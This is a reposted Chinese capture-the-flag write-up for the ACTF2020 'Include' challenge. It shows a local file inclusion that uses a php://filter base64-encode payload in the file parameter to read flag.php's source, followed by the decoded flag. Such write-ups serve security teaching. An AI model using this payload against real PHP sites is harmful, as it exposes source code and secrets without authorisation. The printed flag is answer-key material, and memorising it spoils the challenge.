当前位置：移动技术网 > IT编程>开发语言>PHP > [ACTF2020 新生赛]Include 1【文件包含】【读取代码】

[ACTF2020 新生赛]Include 1【文件包含】【读取代码】

2020年07月29日 | 移动技术网IT编程 | 我要评论

进入靶场环境：

在这里插入图片描述
点击tips：

然后就啥也没了，但是url中有 ?file=flag.php 猜测文件包含漏洞，尝试
文件包含直接读取的是文件，而不是文件源码，所以要想办法读取源码
php://filter/read=convert.base64-encode/resource=xxx.php
这个方法可以读取代码
然后构造playload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
然后对得到的字符串PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NjNlMmIyYzAtNWY5Mi00NjJlLWFkYmYtZTA1ODhhMzQ0MjhjfQo=
进行base64解密得到flag：

<?php
echo "Can you find out the flag?";
//flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}

本文地址：https://blog.csdn.net/qq_41523170/article/details/107617936

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

## hashmap为什么线程不安全

hashmap为什么线程不安全jdk1.7中线程不安全 jdk1.7中造成线程不安全是因为在多线程的情况下扩容... [阅读全文]
网安追踪流程

1.不用代理网民发帖流程：发帖人　→　ISP　→　服务器托管商　→　服务器网警追踪流程：网监　→　服务器IP　→... [阅读全文]
[ACTF2020 新生赛]Include 1【文件包含】【读取代码】

进入靶场环境：http://3ff0893f-e04a-41e6-87ad-a39b1889535e.node3... [阅读全文]
攻防世界web进阶区mfw

打开链接看源代码以为在?page=flag里，啥也没到处点点，在about页面里发现了.git 泄露于是在url... [阅读全文]
HTTP状态码大全

转自：https://www.cnblogs.com/lxinxuan/archive/2009/10/22/1... [阅读全文]
PHP一句话木马免杀

作者：小刚一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢本实验仅用于信息防御教学，切勿用于其它用途PHP木马... [阅读全文]
算法题解 - 牛客编程巅峰赛S1第6场 - 黄金&钻石&王者组

算法题解，三道算法题均来自于牛客编程巅峰赛 S1 赛季第 6 场黄金组。分别涉及大顶堆、哈希、排序、Dijkst... [阅读全文]
JZOJ7月27日提高组反思

JZOJ7月27日提高组反思T1赛时赛后T2赛时赛后T3赛时赛后T4赛时赛后自闭了呀80(10)+30(30)+... [阅读全文]
推荐一个程序员必备网站之一：Dev Hints ，非常实用！

今天，笔者给大家分享一个能提升开发效率的网站：Dev Hints。做为一个技术人员，要记很多东西，但是又不是全部... [阅读全文]
laravel 控制器

1、在 laravel 项目目录下，执行php artisan make:controller IndexCon... [阅读全文]

网友评论


验证码：

[ACTF2020 新生赛]Include 1【文件包含】【读取代码】

2020年07月29日 | 移动技术网IT编程 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论